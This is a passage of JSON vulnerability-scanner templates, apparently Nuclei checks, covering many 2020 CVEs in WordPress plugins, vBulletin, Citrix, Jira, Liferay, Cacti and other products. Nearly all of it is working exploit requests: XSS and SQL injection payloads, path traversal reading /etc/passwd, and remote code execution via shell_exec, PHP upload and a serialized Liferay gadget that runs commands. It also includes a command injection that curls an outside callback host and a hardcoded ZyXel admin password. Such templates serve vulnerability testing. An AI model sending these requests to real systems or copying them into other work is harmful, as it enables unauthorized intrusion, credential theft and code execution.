Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["d03c180355b797069cc047ff5606d689"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21012","info":{"name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /forgot_password.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbtn_forgot=1&email=1%27%20or%20sleep(6)%23\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Hotel Booking System\")"],"condition":"and"}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site 